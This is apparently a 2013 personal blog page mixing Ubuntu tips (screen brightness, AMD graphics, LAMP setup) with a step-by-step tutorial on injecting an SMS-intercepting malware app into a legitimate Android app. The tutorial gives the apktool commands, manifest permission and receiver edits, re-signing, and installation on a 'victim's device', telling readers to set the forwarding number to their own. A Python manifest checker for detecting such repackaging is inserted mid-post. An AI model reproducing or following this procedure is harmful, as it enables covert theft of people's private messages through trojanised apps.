Information Security, Web, Networks and Systems

Sunday, September 8, 2013

Sniff Public Traffic with Wireshark Monitor Mode and BroadCom Wirelesscard in Ubuntu

In this post I'll show you how to sniff packets with Wireshark Monitor mode in Ubuntu. First of all, you need to check which wireless driver is installed on your computer. In my case, on Ubuntu 13.04, you can check your driver installation under Additional Drivers.

Thursday, September 5, 2013

Change Screen Brightness in Ubuntu Terminal

11:35 AM Posted by Deepal
I had a problem with changing the brightness on my HP Pavilion G6 laptop. I could not change the brightness using the function keys. Though I could change it through the Brightness & Lock settings, the lowest brightness level was still too bright for me. So I used the following method to reduce the brightness.

    sudo -s
    nano /sys/class/backlight/intel_backlight/brightness

(In my case it was intel_backlight. This may differ from computer to computer.) Edit the value in the file. In my case the value was about 4000, so I reduced it to 800 and saved. Then the brightness was reduced. You can reduce the brightness to any level by just editing this file.

If you want to reduce the brightness at every startup, include the following command in the /etc/rc.local file. (/etc/rc.local is executed at the end of every startup, so any command you put there runs at every startup.)

    echo 800 > /sys/class/backlight/intel_backlight/brightness

Restart your computer and you'll see your command is effective.

A little more fun :

I created a small shell script (.sh) to reduce my brightness to any amount at any time easily. Without this script, I would have had to change the brightness using the full command given above. The shell script makes it easy: I just execute it and pass the brightness value as a command line parameter, as follows.

    ./brightness 600

Here is my shell script:

    #!/bin/bash
    # Write the requested level to the backlight device (needs root)
    echo "$1" > /sys/class/backlight/intel_backlight/brightness
    echo "[+] Brightness set to $1"

Android Malware Injection into Original Apps

In this post I am going to describe how malicious code can be injected into an original app using Ubuntu. For this post I have created a small malicious app which intercepts incoming SMS and forwards them to another person without the victim knowing when a message arrives. You need the following files to do this:
APKtool (for Windows, you may need to download a Windows version of apktool here)
SignAPK.jar + keys
Malicious SMSHacker.apk app

You can download all of these files from this link:

Here is a rough sketch of the process:
Decompile the original Android app (.apk) using apktool
Decompile the malicious Android app (SMSHacker.apk) using apktool
Copy the decompiled malicious app's files into the decompiled original app
Copy the permissions from the malicious app's AndroidManifest.xml into the original app's AndroidManifest.xml
Recompile the infected original app using apktool
Sign the recompiled app using signapk.jar
Install the recompiled, signed apk file on the victim's device
Let's follow the listed steps:

Step 1:

Download all the files from the mediafire link above. I have included all required files, including the sample SMSHacker app for testing. Copy all files into a single directory.

Copy the apk file into which you want to inject SMSHacker into the same directory. You can keep your apk file in its own directory, but then you need to give its path explicitly in the following step.

Open a terminal and go to that directory. Run the following command to decompile your original apk file (Android app). Let's say your original apk file is named myapp.apk:

    ./apktool d myapp.apk MyAppDec

In the command above, the 'd' switch means you are decompiling the myapp.apk file. 'MyAppDec' tells apktool to place the decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file too (SMSHacker.apk):

    ./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories, SMSHackerDec and MyAppDec, in the same folder, containing the decompiled files.

Step 3:

If you browse into these folders, you'll notice a folder called smali in both decompiled app folders. This smali folder contains all the files decompiled from the apk. When you decompile an apk, its classes are decompiled into files of type .smali. Now go into the folder that contains all the smali files of the malware (SMSHacker) with this command:

    cd SMSHackerDec/smali/com/sms/smshacker/

Then open the SMSHacker.smali file in gedit:

    gedit SMSHacker.smali

I created this malware and tested it on emulators, so I set the SMS forwarding number to '5554'. You can change it to your own number so that all messages the victim receives are forwarded to it. Search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number (say your backup phone :D).

Now copy these malicious files into the decompiled original app's files:

    cd ../../../../../
    cp -R SMSHackerDec/smali/com/* MyAppDec/smali/com/

Now the files are injected into the original app's folder. Next we need to inject the required permissions from SMSHacker's AndroidManifest.xml into the original app's AndroidManifest.xml.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit:

    gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines like these in the file:

    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the 3rd permission for this purpose. So copy the first two lines into the MyAppDec/AndroidManifest.xml file before the <application> tag.

You will also see a few lines like the following inside the malicious app's AndroidManifest.xml (the receiver and its intent filter):

    <receiver android:name="com.sms.smshacker.SMSHacker">
        <intent-filter>
            <action android:name="android.provider.Telephony.SMS_RECEIVED" />
        </intent-filter>
    </receiver>

Copy this part into MyAppDec/AndroidManifest.xml inside the <application> tag and before the first <activity> tag.

Now save MyAppDec/AndroidManifest.xml and close gedit.

Now we have successfully injected the files and permissions, and we can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and the other files are and run apktool to recompile the app:

    ./apktool b -f MyAppDec myhackedapp.apk

The 'b' switch means build and '-f' means force: '-f' skips apktool's change detection and rebuilds all files, so the modified app compiles without complaints.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign the app using signapk.jar before installation. Signing is essential because you cannot install an unsigned app on a device or an emulator.

Sign your apk file using the following command:

    java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. This apk file can be installed on any device, and the victim will execute the malicious code.

SMSHacker.apk is actually an app with a broadcast receiver. When a message is received, the receiver is invoked and executes the code inside its handler; I have put the code that forwards the message to another phone inside that handler. The <receiver> information must be present in AndroidManifest.xml for this to work, which is why we injected the <receiver> block from the malicious manifest into the original manifest. We also need permissions to read an incoming message and send an SMS, so we injected the read-SMS and send-SMS permissions into the original app's manifest.

When installed, this is visible as a normal app on the victim's device, and when the victim runs the app for the first time the receiver starts. After that, even if the victim closes the original app, the receiver continues listening for incoming SMS.
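The two manifest changes just described (both SMS permissions plus a receiver registered for SMS_RECEIVED whose class lives outside the app's own package) are exactly the traces a reviewer or an app-store scanning pipeline looks for when checking whether an apk has been repackaged. The following Python is an added example, not code from the original post or its framework; it parses a decompiled AndroidManifest.xml and flags that pattern, and the two manifests it runs on are constructed.

```python
import xml.etree.ElementTree as ET

NAME = "{http://schemas.android.com/apk/res/android}name"   # the android:name attribute
# What the repackaging steps above leave behind in the host app's manifest.
SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

def sms_intercept_indicators(manifest_xml: str) -> dict:
    """Return the SMS-interception traces found in a decompiled AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    perms = {p.get(NAME) for p in root.iter("uses-permission")}
    # Receivers whose intent-filter actions include the SMS_RECEIVED broadcast.
    sms_receivers = [rcv.get(NAME, "") for rcv in root.iter("receiver")
                     if SMS_RECEIVED in {a.get(NAME) for a in rcv.iter("action")}]
    # A fully-qualified receiver class outside the declared package is the hallmark
    # of code copied in from another app (here the com.sms.smshacker classes).
    foreign = [r for r in sms_receivers
               if "." in r and not r.startswith(".") and not r.startswith(pkg + ".")]
    return {
        "sms_permissions": sorted(perms & SMS_PERMS),
        "sms_receivers": sms_receivers,
        "foreign_sms_receivers": foreign,
        # Both SMS permissions plus an SMS_RECEIVED receiver is the injected pattern.
        "suspicious": SMS_PERMS <= perms and bool(sms_receivers),
    }

# Constructed manifests: one repackaged as the post describes, one untouched.
REPACKAGED_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <application android:label="Notes">
        <receiver android:name="com.sms.smshacker.SMSHacker">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <activity android:name=".MainActivity" />
    </application>
</manifest>"""
CLEAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET" />
    <application android:label="Notes"><activity android:name=".MainActivity" /></application>
</manifest>"""

if __name__ == "__main__":
    for label, text in (("repackaged", REPACKAGED_MANIFEST), ("clean", CLEAN_MANIFEST)):
        print(label, sms_intercept_indicators(text))
```

Run it against the MyAppDec/AndroidManifest.xml produced by apktool to see the same indicators reported on a real decompiled app.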

I have included this as a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can choose from many types of payloads to inject into any original app.

Thanks for reading and if there are any issues, post a comment below.

Wednesday, September 4, 2013

Fix Issues in ATI Radeon Graphics - Ubuntu 13.10 and earlier

1:42 PM Posted by Deepal
If you are using Radeon graphics or any other dedicated AMD graphics card alongside Intel graphics in your laptop, you might have encountered overheating and shorter battery life. If you are using Ubuntu 13.04 or an earlier version, you can shut down the AMD graphics card permanently, let the Intel graphics do the work, and solve both problems. But if you are using Ubuntu 13.10 (at the time of writing, the latest Ubuntu version is 13.10), you can install the AMD Radeon drivers including Catalyst Control Center, since Ubuntu 13.10 now supports ATI hybrid graphics.

Install and configure LAMP Server and PhpMyAdmin on Ubuntu

12:26 PM Posted by Deepal
Hello all. As the first post in my Ubuntu blog, I am going to describe how to install and configure the Apache web server on Ubuntu. Most tutorials found on the internet describe either how to install the Apache web server or how to install phpMyAdmin on Ubuntu. In this tutorial I'll describe how to install the Apache web server using LAMP (the Linux version of WAMP, as you may know), install phpMyAdmin and configure it to work together with Apache, and discuss some frequently asked questions about working with Apache on Ubuntu.